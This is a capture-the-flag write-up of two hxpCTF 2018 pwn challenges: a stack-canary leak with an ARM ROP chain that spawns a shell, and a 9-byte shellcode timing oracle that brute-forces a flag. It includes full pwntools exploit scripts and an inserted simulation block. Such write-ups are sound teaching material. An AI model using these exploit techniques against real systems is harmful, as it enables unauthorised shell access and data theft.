骑麦兜看落日

[WriteUp]hxpCTF

2018/12/07

PWN


poor_canary


Challenge info

Please hack.


Download:

poor_canary-416f0aa7555d7ca8.tar.xz

Connection:

nc 116.203.30.62 18113


Binary analysis

```
$ file canary 
canary: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=3599326b9bf146191588a1e13fb3db905951de07, not stripped
$ checksec canary
Arch: arm-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x10000)
```

Solution

The challenge is not hard: leak the canary, then build a ROP chain. The one thing to keep in mind is that the binary is ARM.


EXP

```python
from pwn import *

context(log_level = 'debug', arch = 'arm', os = 'linux', terminal = ['tmux','splitw','-h'])

exe = './canary'
elf = ELF(exe)

#io = process(['qemu-arm','-g','2333','./canary'])
io = remote('116.203.30.62',18113)
def gdb(script=''):
    attach(io,gdbscript=script)

# Overflow one byte past the 0x28-byte buffer so the canary's NUL low byte is
# overwritten; the program then echoes the remaining three canary bytes back.
io.recvuntil('> ')
io.send('A'*0x29)
io.recvuntil('A'*0x29)
canary = u32(io.recv(3).rjust(4,'\x00'))   # restore the leading 0x00 byte

# Addresses are fixed: statically linked, no PIE
bin_sh_addr = 0x00071eb0
system_addr = 0x00016DA8
p_r0_r4_pc_addr = 0x00026b7c   # pop {r0, r4, pc}

payload = 'A'*0x28
payload += p32(canary)
payload += p32(0)
payload += p32(0)
payload += p32(0)
payload += p32(p_r0_r4_pc_addr)
payload += p32(bin_sh_addr)   # r0 = "/bin/sh"
payload += p32(0)             # r4
payload += p32(system_addr)   # pc = system

io.send(payload)
pause()
io.recvuntil('A'*0x28)
io.sendline()

io.interactive()
```

yunospace


Challenge info

How does free code execution sound to you? If only the whole thing wasn’t that narrow.


Download:

yunospace-72eaeebb6cbb17a4.tar.xz

Connection:

nc 195.201.127.119 8664


Binary analysis

```
$ file yunospace 
yunospace: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0726aed5ad0018b0f1f538a6d5fa6a10e27b1aba, stripped
$ checksec yunospace
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
```

Solution

This challenge resembles one from the earlier HuWangBei (护网杯) CTF. There have been a lot of these lately; for now I'll call them "minimal shellcode" challenges.

First, a recap of the HuWangBei challenge. It mmap'd two regions, one used as the code segment and one as the stack segment, and only the values of rsp and rip were preserved. The trick was that when the two mmap'd addresses were invalid, they got remapped to two valid regions at a fixed distance from each other, so a read syscall could overflow from the stack region into the code region and execute the shellcode written there. That took only 6 bytes.

I initially wanted to use the same approach here, but ran into two problems:

  1. The stack region is not executable and the code region is not writable.
  2. The randomly chosen address is always valid after the arithmetic applied to it.

So that method is out. Re-analysing the binary turned up two other points:

  1. 9 bytes can be read in.
  2. The 9 bytes read in are immediately followed by one byte of the flag (see the .py file).

So the approach should not be to execute execve() but to brute-force the flag byte by byte. I first thought of calling the write syscall directly, but that can't be done in 9 bytes, so I used an approach similar to blind SQL injection on the web: compare the guess against the flag byte and return a different state depending on the result.

The assembly is as follows:

```asm
cmp byte ptr [rip+2],flag_byte
loop:
je loop
```

When the comparison fails, the connection returns EOF; otherwise it loops forever. That difference tells us whether the guess is the flag byte.
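As an added example (not part of the original writeup), the following hand-encodes the 9-byte stub above, checks that the rip-relative operand really lands on the byte directly after the stub, and drives the hang/exit oracle against an in-process stand-in for the remote service. The flag value and the `run_probe` stand-in are constructed for the demo.

```python
import struct

def encode_probe(guess):
    """Encode `cmp byte ptr [rip+2], guess` followed by `loop: je loop`.

    cmp r/m8, imm8 with a RIP-relative operand is 80 /7 ib: opcode 0x80,
    ModRM 0x3D (mod=00, reg=7, rm=101 = RIP+disp32), disp32, imm8 (7 bytes).
    je rel8 is 74 cb; rel8 = -2 jumps back onto the je itself (2 bytes).
    """
    assert 0 <= guess <= 0xff
    cmp_insn = b"\x80\x3d" + struct.pack("<i", 2) + bytes([guess])
    je_self = b"\x74\xfe"
    return cmp_insn + je_self          # 9 bytes exactly, the challenge's limit

def cmp_target_offset(code):
    """Offset, relative to the stub start, that the cmp operand reads."""
    disp = struct.unpack("<i", code[2:6])[0]
    next_rip = 7                       # RIP during cmp = end of the 7-byte instruction
    return next_rip + disp             # -> 9, the byte directly after the stub

def run_probe(code, flag_byte):
    """Constructed stand-in for the service: emulate the stub's two outcomes.

    A matching guess spins on `je loop` (the connection hangs); a mismatch
    falls through and the process exits (the client sees EOF).
    """
    guess = code[6]
    return "hang" if guess == flag_byte else "exit"

def recover_flag(flag):
    """Brute-force each position the way the writeup does, one byte at a time."""
    out = []
    for idx in range(len(flag)):
        found = "?"
        for c in range(0x20, 0x80):    # printable range, as in the exploit
            if run_probe(encode_probe(c), flag[idx]) == "hang":
                found = chr(c)
                break
        out.append(found)
    return "".join(out)

CONSTRUCTED_FLAG = b"hxp{demo}"        # constructed sample, not the real flag

if __name__ == "__main__":
    print(encode_probe(0x41).hex(), cmp_target_offset(encode_probe(0x41)))
    print(recover_flag(CONSTRUCTED_FLAG))
```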


EXP

```python
#!/usr/bin/env python

import threading
from pwn import *
context(log_level = 'debug',arch = "amd64",os = "linux")

exe = './yunospace'
ip = '195.201.127.119'
port = 8664
elf = ELF(exe)

def gdb(script = ''):
    attach(io,gdbscript = script)

def count(idx):
    # Ask for flag byte `idx`; the service refuses once idx runs past the end
    # of the flag, which gives us the flag length.
    io = remote(ip, port)
    io.recvuntil('> Welcome. Which byte should we prepare for you today?\n')
    io.sendline(str(idx))
    result = io.recv()
    io.close()
    if result == "> That's beyond my capabilities. Goodbye.\n":
        return True
    else:
        return False

def pwn(flag,idx):
    for c in range(0x20,0x80):

        # 9 bytes: compare the byte right after the stub (the flag byte) with
        # the guess; a match spins forever, a mismatch falls through and exits
        payload = asm('''
        cmp byte ptr [rip+2],'''+hex(c)+'''
        loop:
        je loop''',arch="amd64")

        io = remote(ip, port)
        io.recvuntil('> Welcome. Which byte should we prepare for you today?\n')
        io.sendline(str(idx))
        io.recvuntil('> Ok. Now your shellcode, please.\n')
        io.send(payload)
        try:
            # timeout (still looping) means the guess matched; EOF means it did not
            io.recv(timeout=3)
            flag[idx] = chr(c)
            break
        except Exception:
            continue
        finally:
            io.close()

counts = 0

# Probe indices until the service refuses, to learn the flag length
while True:
    boolean = count(counts)
    if boolean:
        break
    counts += 1

t=[]
flag = [''] * counts   # one slot per flag byte (was [[]]*counts, which breaks ''.join)

for i in range(counts):
    t.append(threading.Thread(target=pwn,args=(flag,i,)))
    t[i].start()

for i in range(counts):
    t[i].join()

print(''.join(flag))
```
